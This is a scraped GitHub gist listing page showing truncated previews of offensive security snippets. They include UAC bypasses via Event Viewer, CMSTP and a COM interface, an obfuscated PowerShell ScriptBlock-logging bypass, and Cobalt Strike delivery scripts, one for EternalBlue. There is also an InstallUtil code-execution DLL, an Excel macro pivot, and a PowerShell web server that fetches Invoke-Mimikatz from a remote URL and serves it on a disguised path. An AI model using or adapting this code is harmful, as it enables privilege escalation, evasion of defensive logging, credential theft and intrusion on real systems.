Skip to content

Instantly share code, notes, and snippets.

View RCStep's full-sized avatar

Ryan Stephenson RCStep

View GitHub Profile
@rsmudge
rsmudge / stagelesspython.cna
Created April 26, 2017 18:15
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
yield;
@leoloobeek
leoloobeek / EventVwrBypass.cs
Last active April 10, 2025 11:47
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active April 15, 2026 11:37
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active July 1, 2026 08:27
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rsmudge
rsmudge / eternalblue.cna
Last active August 18, 2024 18:23
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@tylerapplebaum
tylerapplebaum / UACBypass.inf
Last active April 6, 2026 18:06 — forked from api0cradle/CorpVPN.cmp
CMSTP.exe scripts and files
; No longer needed - embedded in script now
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
@cobbr
cobbr / server.ps1
Last active January 30, 2020 18:55 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
@Arno0x
Arno0x / installUtil.cs
Created September 26, 2017 11:51
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/